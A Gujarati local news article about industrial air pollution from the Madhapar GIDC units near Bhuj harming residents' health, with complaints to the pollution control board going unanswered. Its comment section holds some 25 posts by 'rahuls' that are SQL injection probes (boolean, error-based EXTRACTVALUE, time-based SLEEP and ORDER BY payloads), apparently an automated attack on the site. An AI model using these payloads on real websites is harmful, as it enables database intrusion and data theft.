Trending News
સ્થાનિક સમાચાર

ભુજની ભાગોળે ધમધમતા ઉદ્યોગો ફેલાવી રહ્યા છે ઝેરી પ્રદુષણ : લોકોના આરોગ્યને ખતરો

10 May

જીપીસીબીની નજર સામે




ઔદ્યોગિક વિકાસ એ કોઈપણ વિસ્તારની પ્રગતિનો માપદંડ પરતુ સ્થાનિક માનવ વસાહતો માટે ઉદ્યોગો બન્યા પરેશાનીનું કારણ

ભુજ-માધાપર સમીપે જીઆઈડીસીમાં આવેલા એકમો દ્વારા ફેલાવતા વાયુ પ્રદુષણથી બીમારીઓનું વધ્યું પ્રમાણ : આસપાસમાં વસવાટ કરતા લોકો બની રહ્યા છે શ્વસન સંબંધીત બિમારીઓનો ભોગ


પ્રદુષણ ઓકતા ઉદ્યોગગૃહો સામે ગુજરાત પ્રદુષણ નિયંત્રણ બોર્ડને કરવામાં આવેલી થોકબંધ રજુઆતો રહી બેઅસર : આસપાસ ખેતીલાયક જમીન - મકાનની છત પર છવાઈ રહી છે પ્રદુષણની કાળી ચાદર


ભુજ  : ઔદ્યોગિક વિકાસ એ કોઈપણ વિસ્તારની પ્રગતિનો માપદંડ ગણાય છે. ઉદ્યોગોના વિકાસ થકી જે-તે વિસ્તારમાં માળખાગત સુવિધાઓના વિકાસની સાથે રોજગારીની વિપુલ તકોનું સર્જન થતું હોય છે. પરંતુ સ્થાનિક માનવ વસાહતો માટે ઔદ્યોગિક ક્ષેત્રનો વિકાસ મોટી પરેશાનીનું કારણ પણ બને છે. ઔદ્યોગિક એકમ દ્વારા ફેલાવવામાં આવતા જળ-વાયુ પ્રદુષણ આસપાસની માનવ વસાહતો પર નકારાત્મક અસર થતી હોય છે. વર્ષ ર૦૦૧માં આવેલા વિનાશક ભૂકંપ બાદ નવસર્જન પામેલા કચ્છમાં ઔદ્યોગિક વિકાસ ખુબ થયો છે. પરંતુ કેટલાક વિસ્તારમાં ઉદ્યોગોના કારણે ખેતી, પશુપાલન, માછીમારી જેવા પરંપરાગત વ્યવસાયો તો કેટલાક ક્ષેત્રમાં આસપાસના રહેણાંકના વિસ્તારને વ્યાપક નુકશાન પણ થયું છે. કચ્છ જિલ્લા મથક ભુજની આસપાસ માધાપર જીઆઈડીસી વિસ્તારમાં નાના-મોટા ઉદ્યોગો ધમધમી રહ્યા છે. આ ઉદ્યોગોના કારણે માધાપર અને આસપાસના ગામોમાં માનવ વસાહતને પારાવાર સમસ્યાઓનો સામનો કરવો પડી રહ્યો છે. સ્થાનિક લોકોના જણાવ્યા અનુસાર માધાપરની આસપાસ ધમધમતા ઉદ્યોગોના કારણે વાયુ પ્રદુષણનું પ્રમાણ ચિંતાજનક હદે વધી રહ્યું છે. હવામાં ઝેરી વાયુનું પ્રમાણ વધતા લોકોને શ્વસન સંબંધિત બિમારીઓ થઈ રહી છે. તો કેટલાક કિસ્સાઓમાં પ્રદુષણના કારણે લોકોને એલર્જીક રોગો પણ થયા હોવાનું જાણવા મળી રહ્યું છે.ઉદ્યોગો દ્વારા ફેલાવવામાં આવતા ધુમાળા સહિતના પ્રદુષણના કારણે વડિલો, બિમાર લોકોની હાલત વધુ કફોળી બની છે.  નવાઈની વાત તો તે છે ગુજરાત પ્રદુષણ નિયંત્રણ બોર્ડની કચેરી ખુબ નજીકના જ અંતરે ભુજમાં આવેલી હોવા છતાં અધિકારીઓની નજર નીચે પ્રદુષણ ફેલાવવામાં આવી રહ્યું છે. સ્થાનિક લોકો દ્વારા અવારનવાર કરવામાં આવેલી રજુઆતો બે-અસર રહી હોય તેમ પ્રદુષણ ઓકતા ઉદ્યોગગૃહો સામે કોઈ જ કાર્યવાહી કરવામાં આવી નથી. ફેકટરીઓમાંથી જે ઝેરી ધુમાળો અને કોલસાની ભુકી હવામાં ફેલાય છે. તેનાથી આસપાસની ખેતીલાયક જમીનને મોટું નુકશાન થઈ રહ્યું છે. ફળદ્રુપ જમીન પ્રદુષણના કારણે બંજર બની રહીછે. બીજીતરફ રેહણાંકના મકાનોની છત-છાપરા પર પણ કાળી ડસ્ટની ચાદર પથરાઈ જાય છે. હવામાં ફેલાવાતી ઝેરી ડસ્ટથી લોકોને આંખોમાં બળતરા, શ્વાસ લેવામાં તકલીફ વગેરે જેવા રોગો થઈ રહ્યા છે. હવામાં ફેલાવવામાં આવતા ઝેરી પ્રદુષણથી સ્થાનિક રહેવાસીઓનું જીવન દુષ્કર બની ગયું છે. ઉનાળાના દિવસોમાં જ્યારે વેગીલા વાયરા ફુંકાતા રહે છે ત્યારે હવામાં ફેલાયેલું પ્રદુષણ ખાસ અસરકરતુ નથી પરંતુ શિયાળા અને ઠંડક ભર્યા દિવસો દરમ્યાન તેની વ્યાપક અસર જોવા મળે છે. ઉદ્યોગ ગૃહોની નજીક હાઈવે પરથી પસાર  થતો રાત્રીના સમયે પ્રદુષણની અસર વધુ જોવા મળતી હોય છે. દિવસ-રાત ધમધમતી ફેકટરીઓ સ્થાનિક લોકો માટે પરેશાનીનું કારણ બની છે ત્યારે વારંવાર થતી રજુઆતોને ગંભીરતાથી લઈ જીપીસીબી પ્રદુષણને નિયંત્રણમાં લેવા કડક કાર્યવાહી કરે તે ઈચ્છનીય હોવાની લાગણી સ્થાનિકો વ્યક્ત કરી રહ્યા છે.

Comments

  • rahuls

    'or1=1--E

  • rahuls

    (,("'))((.

  • rahuls

    'hkTsrB<'">yxZDES

  • rahuls

    ) AND 5067=5608 AND (1086=1086

  • rahuls

    AND 3021=8540

  • rahuls

    ') AND 2608=9929 AND ('HaMZ'='HaMZ

  • rahuls

    ' AND 1781=6758 AND 'daOa'='daOa

  • rahuls

    AND 4199=2854-- QtNT

  • rahuls

    (SELECT (CASE WHEN (7384=7539) THEN '' ELSE (SELECT 7539 UNION SELECT 2792) END))

  • rahuls

    (SELECT CONCAT(CONCAT(0x71706a6271,(CASE WHEN (6397=6397) THEN 0x31 ELSE 0x30 END)),0x71786a6271))

  • rahuls

    ) AND EXTRACTVALUE(7315,CONCAT(0x5c,0x71706a6271,(SELECT (ELT(7315=7315,1))),0x71786a6271)) AND (5029=5029

  • rahuls

    AND EXTRACTVALUE(7315,CONCAT(0x5c,0x71706a6271,(SELECT (ELT(7315=7315,1))),0x71786a6271))

  • rahuls

    ') AND EXTRACTVALUE(7315,CONCAT(0x5c,0x71706a6271,(SELECT (ELT(7315=7315,1))),0x71786a6271)) AND ('jwZt'='jwZt

  • rahuls

    ' AND EXTRACTVALUE(7315,CONCAT(0x5c,0x71706a6271,(SELECT (ELT(7315=7315,1))),0x71786a6271)) AND 'LkNP'='LkNP

  • rahuls

    AND EXTRACTVALUE(7315,CONCAT(0x5c,0x71706a6271,(SELECT (ELT(7315=7315,1))),0x71786a6271))-- PBfM

  • rahuls

    ) AND (SELECT 2438 FROM (SELECT(SLEEP(5)))REiH) AND (8406=8406

  • rahuls

    AND (SELECT 2438 FROM (SELECT(SLEEP(5)))REiH)

  • rahuls

    ') AND (SELECT 2438 FROM (SELECT(SLEEP(5)))REiH) AND ('SnqT'='SnqT

  • rahuls

    ' AND (SELECT 2438 FROM (SELECT(SLEEP(5)))REiH) AND 'VeXK'='VeXK

  • rahuls

    AND (SELECT 2438 FROM (SELECT(SLEEP(5)))REiH)-- nabl

  • rahuls

    ) ORDER BY 1-- -

  • rahuls

    ORDER BY 1-- -

  • rahuls

    ') ORDER BY 1-- -

  • rahuls

    ' ORDER BY 1-- -

  • rahuls

    ORDER BY 1-- -

COMMENT / REPLY FROM